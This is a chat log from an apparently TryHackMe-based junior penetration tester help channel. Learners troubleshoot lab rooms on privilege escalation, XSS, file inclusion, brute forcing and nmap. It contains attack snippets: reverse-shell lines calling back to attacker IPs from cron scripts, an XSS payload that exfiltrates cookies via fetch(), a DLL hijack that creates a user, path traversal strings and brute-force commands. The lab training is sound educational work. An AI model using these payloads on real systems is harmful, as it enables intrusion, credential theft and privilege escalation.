#junior-pentester-path

Well I do see a position added on the cookie there

Press clear on the right side and set the position correct again

Want me to request it again or.. ?

No you can just edit that request in the image above. So on the right side there is a clear button

see the blue dot, add the prefix there.

I got it!!!

all I found is base64 as unusual

Why would you use sudo for that command, it already has the SUID bit set and will run as root

I tried without sudo first

but it says -sh: 5: ./base64: not found

Ye, because you are most likely not in the same directory as the base64 binary when running that command

oh!

thank you @shadow echo

Gave +1 Rep to @shadow echo

flag3.txt: Permission denied! do I need to create a root use to access flag3? @shadow echo

What's the command you used to read flag 3 ?

cat and less

Well, I mean you already have the base64 binary with SUID bit set, why don't you use that to read the flag?

oh, thats right!

thank you @shadow echo

Gave +1 Rep to @shadow echo

Linux Privilege Escalation: Cron Jobs

$ cat antivirus.sh
bash -i >& /dev/tcp/10.9.4.34/7777 0>&1

Could not getting response on my nc screen. What am I missing here?

Protocols and Servers 2 : Task 5 scp
I have tried "scp <FILE> user:<IP>:<PATH>", but it said "no such a file or directory". Does this has something to do with my machine or the command I used? Thanks

I think you are missing the shebang, but not sure if that's the issue. So on top of the file try adding: #!/bin/bash

oh yes, I forgot to add shebang

Where are you running that command, on your machine or on the target machine?

shebang has been added, but, no luck

I ran it from my kali

So the way you wrote to command, it's trying to upload the file to the remote system, so you have to do it the other way around. So specify the command in the way that it's downloading the file.

Oh right, thank you @shadow echo. I'm having a look now

Gave +1 Rep to @shadow echo

So in the crontab, what path is defined for the antivirus.sh ?

it was / and none

• • • • • root /antivirus.sh
• • • • • root antivirus.sh
• • • • • root /home/karen/backup.sh
• • • • • root /tmp/test.py

Okay and in which folder did you place the antivirus.sh?

/home/karen

Could you make a screen of the whole crontab in order for me to see the PATH variable in it

sure

Okay, so the task states: If the full path of the script is not defined (as it was done for the backup.sh script), cron will refer to the paths listed under the PATH variable in the /etc/crontab file. So that means you should have a look at the PATH variable in the crontab and figure out what could be wrong with the directory you placed the file in.

Also make sure there is no other antivirus.sh file on the target machine by searching with find.

okay

couldn't make file on || /usr/bin or /usr/sbin || @shadow echo

Okay, well there are a few more paths in it, so either you try one of these, or try to use another script that's listed in the crontab

l tried to use || backup.sh || first but no luck

Why not?

||
$ cat /home/karen/backup.sh
#!/bin/bash
#cd /home/admin/1/2/3/Results
#zip -r /home/admin/download.zip ./*
bash -i >& /dev/tcp/10.9.4.34/6666 0>&1
||

|| $nc -nlvp 6666 ||

can't figure out why!

Are you on the attackbox or your own machine? Also I would try to get rid of these other stuff like #cd and #zip and keep an empty line after the shebang like it's shown in the task. (Not sure if that could cause an issue, but maybe.)

my machine

@viral token can you print here output of ls -la /home/karen/backup.sh ? I think I know what the problem might be as I also had something similar (potentially) 😉

ok

Thank you @modest arch 🙂

Gave +1 Rep to @fluid stag

can anyone explain me the whole nmap packet theory on dm??

Privilege Escalation: NFS
there is no gcc installed on target machine. Could anyone help me to find the script?

you don't need to compile it on target machine. Use your local/attackbox

ok

it says mount: only root can use "--options" option. how can I mount the folder?

Did you try to mount it from your machine/attackbox ? Check relevant config on the target VM, then use what you have found on your machine/attackbox to mount

ok

mount -o rw 10.10.0.235/home/backup /tmp/backupon
mount: /tmp/backupon: mount point does not exist.

Man I had the same problem ahah, look closer at your command, it is missing something tiny. Also you need to create mount point if it doesn't exist on your machine (that is actually what error suggests). So two problems here

I notice there is a : missing

actually this whole mount thing is not clear to me, may be thats why I am beating the bush

$ showmount -e
Export list for ip-10-10-0-235:
/home/ubuntu/sharedfolder *
/tmp *
/home/backup *

The critical element for this privilege escalation vector is the “no_root_squash” option you can see above. By default, NFS will change the root user to nfsnobody and strip any file from operating with root privileges. If the “no_root_squash” option is present on a writable share, we can create an executable with SUID bit set and run it on the target system.
That basically means that when you mount a remote share and create any files from your machine on that remote share with root account, that will be overwritten by nfsnobody unless no_root_squash option is set for that share. If it is set then that will allow to inherit ownership of the file created on your machine.

Ie. if you create file test.sh as root on the remote share from your machine and no_root_squash is NOT set then when you check ownership of that file on the remote machine(target) its owner will be nfsnobody .

Since no_root_squashfs is set (check appropriate config file for that on the target machine to make sure), then ||you can mount that share from your attack machine and upload binary which is owned by root and with SUID set||

thnaks a million @modest arch

thank you @modest arch

Gave +1 Rep to @fluid stag

Hey y'alls... question... for the J.P.T. Burp Suite Other Modules, for this, Decoder. For the last question that "Some joker has messed with my SSH key!........ " Do you copy the file into the Decoder and decode the file to MD5 hashsum? If so, none of the keys matched the hash in question. It sounds like it was altered ...

need some clue on Linux Privesc Capstone

Just starting out after passing sec+ what’s good

it was a match for me

So weird... it's showing as unmatched for the hash in question.

how do you try?

I took each key.. one by one... then hash it with MD5, then encode it with ASCII Hex

So, for the key, I just copy the key, paste it in the box of the decoder..

I can do it via the command line easy but it isn't giving the exact hash..

I just tried again, and its a match here

Like what I did in the screenshot?

I just open the key file and copied the text and past it in to the box

Oh, copy the contents inside it.

aye

Bingo... damn...

I was surprised that it could still take the path to the key.

I assumed that the txt file + the key inside it would have a bit differences... yet, i should have known to just try it.

How long is it supposed to take to find the passwords on the NetSec Challenge? Hydra has been trying for almost an hour.

nvm

Not able to understand the difference between the commands as both [nmap -sn TARGETS] and [nmap -PE TARGETS] scanning the live hosts using same ICMP only.

is there a reason why linprivesc room, task 7 --- neither methods work?

i can't save the modified buffer for /etc/passwd to add a user and I can't read or edit /etc/shadow

I'm on the network security section: protocols and servers... but I haven't done anything with hydra yet, does the path teach you hydra before you come to those challenges?

Where do you see something about the -PE flag?

Jr Penetration tester > Network security > Nmap live host discovery > Nmap Host Discovery Using ICMP

Anyone mind helping me out with Protocols and Servers POP3 question 2? It's asking a question for IMAP which is in the next section, but I'm unable to login when I telnet to the box on port 143.

I can connect on the IMAP port with telnet, but using the LOGIN frank password it gives me an error.

so, sudo nmap -PE target_ip just does a ping to see if target machine is alive, or what machines are alive / on if you are scanning a subnet.
and, sudo nmap -PE -sn target_ip also does a port scan on every machine in that subnet.

Ideally, you'd be better off enumerating what systems are alive before scanning ports as it is more noisy and time consuming.

if you do an nmap scan for an IP / subnet using the different flags you can easily see the output, but I'll post a screenshot here for you.

Really thanks for the output and finally solved!

Sure thing

nevermind, guess it teaches it in the module i'm on now. 😛

It does. There's a brief section on it. I was having a hard time because I forgot to add the port # on the end of the command.

I see, thanks for the hint. 😉 I'm starting the challenge now.

Gave +1 Rep to @bronze zephyr

You're welcome. Good luck!

I'm in burpsuite.... When I render.... It says embedded browser inizaliatation failed. Not sure what to do.... But that's where my flag should be. Burpsuite repeater task 6.pls help

Found the flag 🚩😎 no worries

Question: for the capstone on the Linux PrivEsc room, is $PATH a viable option? (I ruled out a thing or two, and I know I have other options, but it seems to me like PATH is vulnerable because I can write to folders that are involved, but I can't get it to work. Not sure if I'm wrong that it's vulnerable or if I'm effing up the execution) https://tryhackme.com/room/linprivesc

(I looked at some writeup and none seem to be using PATH, but don't comment on ruling it out either)

any of the topics in that room are viable. i used linpeas/linenum to help me in the correct direction

I'm in Burpsuite repeater-Task7
I have to cause a 500 error but just getting a 404. I've tried extreme inputs

Lol please help me cause a 500 error

checking notes. but i think you can try all types of high /low, zero, non-zero, negative

this was before i took notes, but looking at the hint just try different input.

@jade lodge for example in replacing products/3 with products/999 but getting 404

you're trying to break a website/application. don't be nice. be extreme. 🙂

@jade lodge
https://media.tenor.com/images/d5b8c7b4d4876bd7b84a55ac1e8b2b37/tenor.gif

exactly. thow letters, symbols, a gazillion, negative numbers, decimals, fractions. see what sticks

I'm gonna type a destructive essay now

@jade lodge I wrote nuclear warcodes. But yet 404 is still there 💭😅

nvm, figured it out

in the xss room

the blind xss

i'm waiting for the connecting to my netcat

but nothing come up

when i click on the payload i receive my own cookies

Restart the target machine and try again, or try it on the attackbox if you haven't already or try using the request catcher. It's a bit buggy sometimes for the automation to trigger opening the ticket.

yeah, i solved it

If you get 404 it means that it can't find what you searched. You have to use "strange" characters to break the code. If you get 404 it means that the server can understand what you wrote

gentlemans

airodump-ng not showing any interfaces

i did exact in the youtube their showing mine not

thanks!

Gave +1 Rep to @jade lodge

@ocean socket

I'm gonna make a txt file with the strangest and paste it in💭

guys in inux privesc room task 5 i am not able to transfer the exploit to attacking machine ! i try that ython server and wget coomand but it displays permission denied how should i do that??

You most likely try to wget the file in a directory where you don't have write permission to.

so how do i know in which directory i have permission??

Use find, also there is a very common directory where most likely you have write permission to.

why it says permisiion denied when i run the ./exploit

does the binary have execute privs?

i don't get it??

chmod +x

tried that

@shadow echo got any idea mate??

Do a ls -al exploit and show the permissions pls.

if you have a problem running a binary, the things you want to check are 1) check perms to the file and directory? 2) ensure you can execute the file 3) ensure you can write to necessary directories if needed

And what if you do ./exploit now?

permisiion denied

Have you tried it right now?

yup

which user/dir are you in? can't see from the screens

karen

This is where understanding the linux OS fundamentals come in handy. You should review tools such as touch, chmod, chown.

i know those tools

cd to ~ or /tmp

but what use of them here is??

do a whoami

ok

and paste the output here

$ whoami
karen

switch to /tmp and try again. and run the command with the full path /home/karen/exploit (or whatever)

oghh got it

got the root

Thanks Guys all of you!!

it didn't seem like the application had execute flags

imo

to solve my own curiosity, can you go back into that directory and
chown karen:karen ./exploit
chmod +x ./exploit

then try to run it?

ok

ohh dang i terminated the machine gonna start again

ah, no worries

was just curious, cause you should've had execute perms in that directory

Well the 2nd pictures DarthLotia sent had execute permissions and was owned by karen, so

yeah u r right

it show work

it should

yeah, but my concern here is whether or not the file itself was an executable, that's why i wanted to test chmod +x ./exploit

probably doesn't make sense

Anyone able to give me any pointers for the final question of the Vulnerability Capstone room?
I've gone through all of the RCEs found when using searchsploit. I'm running into a bunch of errors, different errors for each one.

||specifically with /usr/share/exploitdb/exploits/linux/webapps/47138.py|| I'm only seeing the http header response on my nc listener

i had a number of issues with this room as well. I believe I had to make several modifications to the script just to get it to work properly

yeah.. i've had various issues with different ones.... even for the ruby script, i had to install httpclient and docopt gems, and even after that there was still errors when running the script.

PM me and i'll give it a look

thanks for the help

Gave +1 Rep to @jade lodge

Okiee. I'm trying to mess around more with https://tryhackme.com/room/metasploitexploitation task 5. The hint provides a vulnerability, but based on the initial challenge, it would appear there are more than one vulnerability... I've been trying to find at least one other one for like 2.5 hours now and I've had no luck. Is anyone around to kinda nudge me in the right direction?

I've discovered 5 uncommon ports in the 49000's, all service detection done on those ports only indicate msrpc services and I haven't been able to find any vulnerability for msrpc that is valid here.

You’ll have to excuse me as it’s been a while since of done the room. Don’t you just follow along with the task?

Hello all, I'm stuck in the Jr. Pen testing room on the Authentication Bypass, task 3. I can't get the ffuf to work correctly to get the password. Any tips?

This is for the challenges, and in the task it states to use one of the critical vulnerabilities which makes it seem like there's more than just eternalblue which is given to you in the hint.

what is your command that you're using?

In Jr Penetration Tester Path - File Inclusion - Local File Inclusion - LFI # 2 - Question: Give Lab # 3 a try to read /etc/passwd. What is the request look like? I am trying to submit my answer but it won’t let me submit

Can you provide your current answer with a spoiler? I can take a look and point you in the right direction.

/lab3.php?file=../../../../etc/passwd%00 I’m in the app can’t post with spoiler

so if you put that next do the rest of the url, what's it look like.

It showed me the passwd file

oh you edited it

It is good I can see the file

yeah, that looks correct. it's what i have

It’s just I cannot submit the answer

Strange

try logging out of thm, logging back in?

I tried that already

clear cache in browser?

One sec..

It still won’t work 😦 I cannot close this room to 100%

does it says incorrect answer, or unknown error?

Neither

Hey I tried logging in THM through a different browser

Now it submitted

i had issues with bitdefender in a few rooms, espeically sql injection. it would sanitize my answer before submitting so i got something like "invalid response" instead of "incorrect"

Thanks for the heads up. What I had is as if the submit button won’t work if my answer character is beyond ‘n’ characters. All good now tried logging in using Edge browser and it worked

Gave +1 Rep to @jade lodge

Hi Team
I could not find Flags after clicking on the website link provided
Room : Walking An Application - Jr. Penetration Tester
Viewing the page source I could not find the answers to the questions
please help me on this

its bit tough . However I found answers

Anyone completed Task 9 on LinEsc?

Can't seem to get the job to fire off the reverse shell...

What room?

Linux PrivEsc

I've ||modified the backup.sh to include a reverse shell "bash -i >& /dev/tcp/IPHERE/PORTHERE 0>&1", set up a nc listener on the attack box|| but not getting anything

Could you do a ls -al backup.sh and show it to me?

||-rw-r--r-- 1 karen karen 77 Jun 20 10:21 backup.sh||

oh

I see

thanks for the tip 🙂

Hey anyone can help me

with what

I'm stuck on the last authentification Bypass question>logic flaw

I'm stuck on the last question authentification Bypass question>logic flaw

And what are you stuck with, the commands to use are all in the task?

The commands

The last one

So have you created an account on the page?

Yes i think so

Okay, so I don't understand what the issue is then?

Hi Thelius, thanks for repsonding. This is the command I'm using: ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://MACHINE_IP/customers/login -fc 200

Gave +1 Rep to @brazen notch

If you do cat valid_usernames.txt what's the output?

@shadow echo I get 4 user names: admin, simon, roger, and steve I believe

Show me the full output of that file pls

sure let get back in there. This is day 4 I've been trying.

It will be a few minutes since I'm starting the attack box

Sure not a problem

sorry I'm new to discord and not sure how to share the snipit

You have to verify in order to send screens. Check that link:

!docs verify

thanks for your help on getting me verified

So regarding to that screen, can you see for yourself what the problem could be :)?

hmmm...no. The file name is the same what it told me to name it. Is it because the info in the brackets are the same?

Lets go by the first line. ffuf will try the username admin [Status: 200, Size: ..... (not gonna write the full text) instead of just admin

So I guess my problem I don't understand the output.

what does it mean the admin has the same info as the same accounts? Is it they have the same passwords?

So the problem is, the wordlist is supposed to only have 1 username per line without anything else, so no status code, no size, nothing. Only 1 username per line.

So just create a new wordlist and write the usernames manually in it.

Oh...

Ok I will do that. Do you know why it prints out with the other stuff?

Well ffuf is not a wordlist generator, so it prints the infos that might be useful.

got it. I need to do more research on ffuf. I need to fix my doc and I'll let you know how it turns out when I run the next command.

thank you!

thanks for helping him out, i got caught up with work.

Gave +1 Rep to @shadow echo

Hey could someone give me a hint about File Inclusion room, task 8: "Capture Flag3 at /etc/flag3" ? I'm really stuck

Well it depends on how far you already. Or what you have tried.

Apparently there is a whitelist filter in place that only allows a-z characters. I researched about $_request just like the thm tip suggested, but I didn't find anything and I don't know how they found out about $_request

There is a task in that room that explains how to try to bypass a filter.

Ok i will review the tasks, thanks

Gave +1 Rep to @shadow echo

@shadow echo okay i got the flag by lucky, using POST http requests and a null byte, but i don't understand why the filter only works in GET requests, could you please explain it?

What you mean? If you don't use the null byte in a POST request then the filter will still work ?

No, it filters the all dots, slashes, and special characters but just when it's a GET request

I don't think so, if you remove the null byte in the POST request it will also filter the special characters.

Mh k, seems you are right, tried it right now. Maybe in that case the filter only applies when they use $_GET["name"] function in PHP, for example htmlspecialchars($_GET["name"]) but not when using $_POST["name"] function. But, you anyways have to use the null byte otherwise the .php will get appended on your filename.

Oh i see, thanks, i was with this doubt in my head

Gave +1 Rep to @shadow echo

Just want to say thanks for all the help so far. I'm like at 80 percent 😅 I'm trying to get through

@heavy night , @primal whale , Is there a problem with Task 8, Cross-Site Scripting room ? After decoding the cookie and the session . When submitting the decoded cookie . I get wrong answer .

Just wanted to say, that his one is outstanding course. Well structured, full of actual and helpful information.

.

I don't think you should tag staff for a room question that's most likely caused because you did the task wrong, but that's not for me to decide, just saying 🙂 I highly assume the cookie is wrong because you opened the ticket on your own and therefore you received your own session cookie rather then the staff session cookie.

cool, thanks

Gave +1 Rep to @shadow echo

netsec nmap challange any hint im using those flags ||--scanflag SYN --version-intensity 0 --max-retries 0 -T2 -f 0 -Pn|| so tired of it doing it for days literally

You are over complicating it, just try all the different standard scans that have different tcp flag settings. There are like 3 or 4 different scans that do that.

ok thanks i will try

I feel like an idiot and not understanding what it's asking... For the Nmap Live Host Discovery for the J.P.T. Task 7. Does this have to be in the exact order and does this needs to be in the form of a syntax or just the options alone in any order?

I have been at this for over a damn hour...

For both the privilege and non privilege.

I was able to answer the 3rd one easy.

It has to be the name of that scan, it's the same as the headings in that task. For example the last heading in that task is "Masscan"

From the looks of it, it has to be 3 + 3 + 4 (number of characters each). I tried everything. LOL No bueno for me.

The 3rd one was easy.

Well I gave you the path on where to look for it. Search the heading "Masscan" to know what I refer as "heading in that task" to.

Unfortunately, that doesn't even help.

Well there are not too many headings in that task. It's exactly 4 headings, so 😄

I see that but no need to insult....

Insult oO? Where do you see any kind of insult?

When you laugh, but you won't do that in front of me. As stated over a week ago, there are people that look at things the hard way.

I'm just trying to learn here...

No matter how easy it may seem to you.

I don't get what you are talking about, I try to help you, as I'm doing that on a volunteer basis and that's what I get from you? Especially after helping you in a DM for about 30 - 45 mins last time? I'm done talking with you.

Nobody is laughing at you. You were given a hint that basically gives away the answer. You said that dosent help, so there isn't much else anyone can do for you

Umm.. I did offer you compensation for your time and offered to return some as a favor and thank you. And you knew I have a difficulty in advance. But went on to laugh... @drifting drum Yeah, I just couldn't grasp, as Fontaene knew I had some difficulties last time, figure it was known. I often times look at things the hard way... but hey if i don't get it, I don't get it. It's what it is.

Gave +1 Rep to @shadow echo

No offense y'alls.

Peace...

It's just my fault, i'll deal with it and figure it out.

Regarding volunteering, I have done over 5000 hrs since early 2000 in the Computer Engineering/IT department coming from South America and far East to help be part of the technology world. But 30 or so percentage just quit... I like giving back hence why I offered compensation. But I do have some difficulties... the one thing I do not do is laugh at others and be sympathetic in helping others. I have a lot of challenges that I have to overcome. But thanks for that 30-45 min DM help.... I'll figure out the nmap questions...

FYI, I was able to answer the questions... but that hint didn't offer any logical ideas. At least for me.

Lets stop escalating and take the stairs for a minute.

Just read through this, And it looks like Fontaene game you a major hint and you focused a lot on the emoji at the end. Be assured, @alpine wyvern the no-one here laughs at anyone because of their skills - This is a learning site after all - We tend to respect peoples willingness to learn. In addition, This isn't a 'Hacker for hire' site, nor does anyone here help for compensation - We do it because we want to see you (and everyone else) succeed. Our 'Compensation' is the feeling we get when someone we helped pops up asking us to add a cert role to them or that they got a job in the industry.

Either way, peace and love on here - We are all in more-or-less the same boat. We wanna learn

Also @shadow echo Gratz on Blue role. Blue = Best role colour 😄

Never thought it was a "hacker for hire" but more of the time since fontaene was up late at night. I'm just a giver and wanted to return the favor because fontaene didn't need to do it. 🙂 Peace and love here at all. Thank you for your reply. No disrespect to anyone.

Gave +1 Rep to @toxic wedge

Can anyone please tell me how did you answer this quesiton.

"Some joker has messed with my SSH key! There are four keys in the directory, and I have no idea which is the real one. The MD5 hashsum for my key is 3166226048d6ad776370dc105d40d9f8 -- could you find it for me?"

Submit the correct key name as your answer.

try each one in succession

from the downloaded key file

nmap -e NET_INTERFACE -Pn -S SPOOFED_IP MACHINE_IP to tell Nmap explicitly which network interface to use and not to expect to receive a ping reply. I am not able to understand purpose of -Pn.

is it this?@stoic hill
Don’t Ping nmap -PN [target] nmap -PN 192.168.0.1

I believe it is so you leave no record of trying to connect to the target machine

I've got a problem with the last Task in the Cross-site Scripting room where I am supposed to get the staff-session cookie. I used the given payload and edited it. I tried both given options but I never get the expected request. At the TryHackMe request catcher all I can see is a DNS-Lookup and with Netcat I don't get any feedback. Anyone can help me or has some idea what I'm doing wrong?

there are 2 ways to do this. Either try all 4 keys, or downlaod them and then use md5sum <file_name> to grab the md5 sum of each file and see which matches the hash given to you

May be you are right.

-Pn has more uses than that. Sometime firewalls block ICMP packets, and sometimes you need to scan over a pivot which is most cases means you can't send ICMP packets to the target

I have a question about the file inclusion module, challenge# 3. I dont understand why this answer is correct, can someone explain?

Am trying to transfer files to a machine, <linux PrivEscalation> kernel exploits room, but seems wget, curl and even nc not working. nc is only trasferring the file but no content, please someone assist

Wget should work

!docs verify

Follow the instructions at the above link to verify your discord account. Then please send a screenshot of the issue you're having

Okay, thank you

Gave +1 Rep to @drifting drum

Its able to connect back but taking forever to transfer the file

Is the file you want to transfer located on the attackbox (not target machine) or on your own machine?

On my local machine

So did you manage to transfer it now?

No, same issue.. it only connecting to the http server, but transfer rate remains zero, have tried restating VPN but still the same,

Any suggestion on alternative way to transfer?

Is your local machine a virtual machine or an installed operating system?

A virtual machine

And openvpn is running directly inside that VM and not on your host machine?

Yes, on the VM i did counter check. done a restart too.haha

If you enter ifconfig do you only see a tun0 interface or any extra like tun1, tun2 etc?

at once i did see tun1, but tunned off the interface, then recconnected back, so "ifconfig" has only tun0

Okay, so if you right now only have tun0 then it's fine. I assume you are hosting the file with the python webserver ?

How can i change the VPN profile to a new one?

Yea, am using python webserver

Let's first try something else before you jump to using a new vpn config/profile

Try sudo ifconfig tun0 mtu 1200 then maybe restart the python server and try again to wget the file.

cool, let me do it

Thank you so much, that has worked, so how was the mtu an issue?

Maybe your internet connection is not the best.

can anybody help me out with the task 4 of the File Inclusion page? I've typed in a random page and got the error message and I'm unsure of where to go from there

What you mean with you typed in a random page? The page you have to do that task on is specified, it's #Lab 1

ohh okay

I think I've been going about this the wrong way I though lab#2 was for the second question

And yes, lab 2 is for the second question. So you are stuck on question 2?

Yeah sorry I should've been more specific from the start, it's the one asking what is the directory specified in the include function

Okay, so can you send a screenshot of the errors/warnings you got on the page itself?

OK dokie gimme a couple min to boot back in

Okay, so if you compare the warning include(includes/hello.php) with the following task explanation. What is the directory that is specified to be used in the include function?

(include_path='.:/usr/lib/php5.2/lib/php)

so does this part have to used as a launch pad to then move onto the file I want to see?

I don't know what that part is for exactly, so just ignore it for now.

ok I got the answer but I'm none the wiser

Why not, what's the part you don't understand?

I think I'm over thinking this cheers for the help anyway

Alright, not a problem.

Yo why is the flag not working on Blind SQLi - Authentication Bypass

Oh nvm it’s on the next page, weird UX, false alarm

Hello, room metasploit:exploitation task5 question3 I already got access to machine with eternal blue but I can not get the hashes it gives me this error whats wrong can anyone help me?

What type of shell do you have? If you don't already have that, try to upgrade your actual shell to a meterpreter shell

I tried couple times and I got an errors let me try again If Im not missing anything and got error again I can send there

now I got error from eternal blue.. maybe skipping this part better for now 😄

Hey there, trying to get a combination of a username and a password by bruteforcing but the command doesn't seem to show answers. I've also tried to put it in a file but it didn't work. does anybody know what the matter is?

Check your valid usernames file, most likely you don't have 1 username per line (without anything else, no status code, no size, nothing)

yes, that was the problem

thanks a lot!

Gave +1 Rep to @shadow echo

it worked now thanks!

Gave +1 Rep to @shadow echo

Hello all, can someone give feedback of what I may be doing wrong? This is in Authentication Bypass, task 3 (Brute force). I fixed the output of usernames to have only the names on each line and deleted all other output. I still can not get the password to print out...this is day 5 for me..😩

I had the same problem, the cmd on the site does not work I think. I got it to work by running the wordlist on one username at a time. If you look at the lenght of the answer you can narrow it down to 2 usernames if I remember right!

There is a issue with W1 / W2 if I remember correctly you have to use a blank space instead of the , (comma)

f.e: -w username_file -w password_file

The issue most likely is within your valid_usernames file. It's supposed to have only 1 username per line without anything else, so not status code, no size, nothing. Just the usernames.

sup folks

i'm having troubles with windows privesc room

the dll hijacking is ain't working

any1 remember the room or did it recently

need some help ova here

How is your code for the dll file looking like?

nvm i solved it

#include <windows.h>

BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
    if (dwReason == DLL_PROCESS_ATTACH) {
        system("cmd.exe /k net user jack Passowrd123");
        ExitProcess(0);
    }
    return TRUE;
}

        ```

i had problem with section Protocols and Servers 2 on task 5.
i cant download file book.txt. pls help.

(kali㉿kali)-[~/Desktop]
└─$ scp book.txt mark@10.10.212.60:/home/mark
mark@10.10.212.60's password:
book.txt: No such file or directory

You are doing the scp the wrong way around. The way you used the command is for transfering files from your local machine to the target machine.

scp mark@10.10.212.60:/home/mark/book.txt ~ 1 ⨯
mark@10.10.212.60's password:
book.txt 100% 415KB 91.6KB/s 00:04

okay,i see

Hello team

I have project concerning SNMP ENUMERATION SOMEONE COULD HELP ME

Elaborate the concerns....

https://dontasktoask.com/

Does anyone also have problems opening the Windows Privesc machine? For some reason the machine just want load. I have tried multiple restarts . I wish they would have provided RDP credentials.

Did you mange to solve that issue? @fickle pumice

guys let me know if you where able to escalate privileges : PATH, if you where able please share the binary contents with me. I wasn't able but I took the flag like this.

#! /bin/bash
cat /home/matt/flag6.txt

the room is this one https://tryhackme.com/room/linprivesc

Are you talking about task 10 ?

can someone tell me the telnet command to read a file over telnet?

I've been googling all morning to no avail 😅

I can read it over ftp, just not telnet yet

yes

Well instead of using the cat command you just have to use /bin/bash

on the CLI you can use:

man telnet
telnet -h

https://tryhackme.com/room/activerecon

I suggest you take a break and come and try again fresh forcing your self on something you already have been trying "all morning" will result in burnout, feeling overwhelmed, and depending on your emotional intelligence you might get moody.

sometimes the shortest way to learn and articulate concepts seems at simple sight the longest but in reality it is the shortest long-term, you can save yourself a lot of "revisiting" time.

$ id   
uid=1001(karen) gid=1001(karen) groups=1001(karen)
$ export PATH=/tmp:$PATH
$ ls /tmp
snap.lxd
systemd-private-344b193d138b4bd1aeca48dae1c7f00d-systemd-logind.service-t5Gifg
systemd-private-344b193d138b4bd1aeca48dae1c7f00d-systemd-resolved.service-hIWSsh
systemd-private-344b193d138b4bd1aeca48dae1c7f00d-systemd-timesyncd.service-VVqg1g
$ touch /tmp/thm
$ nano /tmp thm
Unable to create directory /home/karen/.local/share/nano/: No such file or directory
It is required for saving/loading search history or cursor positions.

$ nano /tmp/thm               
Unable to create directory /home/karen/.local/share/nano/: No such file or directory
It is required for saving/loading search history or cursor positions.

$ cat /tmp/thm
#! /bin/bash
/bin/bash
$ cd /tmp
$ chmod +x thm
$ ls -l thm
-rwxrwxr-x 1 karen karen 23 Nov 21 17:57 thm
$ cd /home/murdoch 
$ ./test.c
-sh: 13: ./test.c: not found
$ ls -l test.c
ls: cannot access 'test.c': No such file or directory
$ cd /home
$ ls
matt  murdoch  ubuntu
$ cd murdoch
$ pwd
/home/murdoch
$ ls
test  thm.py
$ ./test
root@ip-10-10-150-90:/home/murdoch# id
uid=0(root) gid=0(root) groups=0(root),1001(karen)
root@ip-10-10-150-90:/home/murdoch# 

thanks, worked!
there is the log

Gave +1 Rep to @shadow echo

Gave +1 Rep to @thorn crest

Thanks, I took your suggestion, logged out and came to the park. 😎

last one i got stuck on bypassing it , any ideas ?

I am doing Protocols and Servers and I was wondering why would you use a Telnet communication on an FTP server instead of a connection with ftp?

"slow is smooth and smooth is fast" 😎

well, now THAT was ez 😅

which http request did you use ?

Howdy. I'm doing the Vulnerability Capstone room and I can get a connection back but can't interact with the shell. Can anyone point me in the right direction?

I'll try and do it from the attack box vs vpn. I saw another room have issues with vpn

I think I see what I did wrong

over thinking it

Hello, I've got an issue in the NetSec challenge, specifically the question with the 2 usernames that need an FTP login. I've already got the password for both users and logged in via telnet using the non-default FTP port we discovered before; but now I don't know how to find the flag I'm looking for :(

Since you are already connected give this a quick read https://www.ibm.com/docs/en/scbn?topic=SSRJDU/gateway_services/ftp_globalec/SCN_Summary_of_FTP_Client_Commands_b.html

Oh I didn't think about looking the FTP commands up, however I'm getting the 500 Unknown command error, I think I'm using the syntax wrong but I'm not sure

The PASV and TYPE commands seem to be working but the rest are not

Hello, at linux priv esc task5 in jr pentest path I found the right exploit I wrote it, I opened http server with my host, I logon to victim machine with SSH when im trying to get exploit from my host it gives me "permission denied" can not write

But I believe it should be like this, can anyone give advice or hint?

Look for a directory where you have write permission to.

smart its 2.09am here I couldnt think that it worked thanks

Gave +1 Rep to @shadow echo

Oh nevermind I managed to get it, I had to use the FTP client though. Still thank you @opal furnace !

Gave +1 Rep to @opal furnace

👍

Hi. I am stuck on the Nmap Basic Port Scans/ TCP SYN Scan task. When running nmap -sS IP_ADD I have the same result as the task. I cannot find the new open port. Any idea?

I Just got to syn scan

Hello, I am doing the Cross Site Scripting room and im stuck in the last task. I triple checked the payload and I have the Request Catcher open in another tab. I tried many times and it says "wait a minute for the request to come" but it never did.. can someone point out whats wrong?

</textarea><script>fetch('http://10.10.10.100/84a31a87e5cd30b324f3bde6a7b353f9?cookie=' + btoa(document.cookie) );</script>

Have you tried to manually open the ticket to check if you payload is good? Although if you manually open it you only get your own session cookie.

I opened all of them, i actually thought it would take MY cookie since its a simulation and there isnt any "staff" that opens the tickets

and they are empty, no text.. i assume that means it executed the code

nvm it worked, i was using the page URL of the request catcher which is wrong

Automation

god bless technology

Hello, on lab File Inclusion challenge#4. When I use the command|| <?PHP echo gethostname(); ?>|| should I expect the flag or am I missing something else? Thank you

@exotic jungle Yes, you should expect a flag. Plenty of walkthrough if you are stuck.

Basically you should expect to get the hostname, which iirc is also the flag. What's the reply you get? As first make sure your file inclusion works, if it does, maybe gethostname is not supported, so try to look for an alternative to retrieve the hostname.

I just get a blank answer

So then maybe first try if you use echo that it's also printing it to make sure your code runs.

I found a walkthrough and it showed all the challenges but not the RFI

I tried <?php echo "Hello World" ?> and its a blank too

@exotic jungle You have the flag on the last line of the webpage, right under File content. Add the file path to the playground website and you are done.
Ah! Check stuffy24 if you are stuck on this one.

Well the question is about RFI. So maybe reread task 6 🙂

The command is <?php print exec('hostname'); ?>

thats what I did and not even the test example works

But regarding to the screenshots, you are just entering the command in the file name field. But you are supposed to query a remote file from a different machine. Which will then gets executed with whatever code you have inside that remote file.

yea I know but where's the remote server I'm supposed to use?

You have to provide that remote server yourself, with for example a simple python server.

oh

@exotic jungle Here is what I did: 1. start python3 webserver and open a port of your choice. 2. Inject the file, Playgroundwebpag_IP file=Your IP_ADDRESS:PORT/file

all right let me open the attackbox and try that

Managed to get the TCP SYN Scan to work. I restarted the machine, works like a charm. UDP Scan takes forever though.

That's pretty normal, UDP scans are inherently slow and unreliable

👍

hey, i'm trying to get a support ticket using "curl", it shows me the page in the terminal, but it doesn't send me any info on the web site. anyone knows what's wrong? the email address and all other info is correct

My guess is that you are trying to do a POST request, so try curl -X POST

unfortunately it didn't work

What room are you working on?

Authentication Bypass, but I already found the mistake: I didn't mention 'form' in content type

but anyway, thanks!

Gave +1 Rep to @opal furnace

I'm having trouble with Brute Forcing via fuff in the Authentication ByPass Module. The suggested command does not give me any result. I found 4 usernames in the step before.

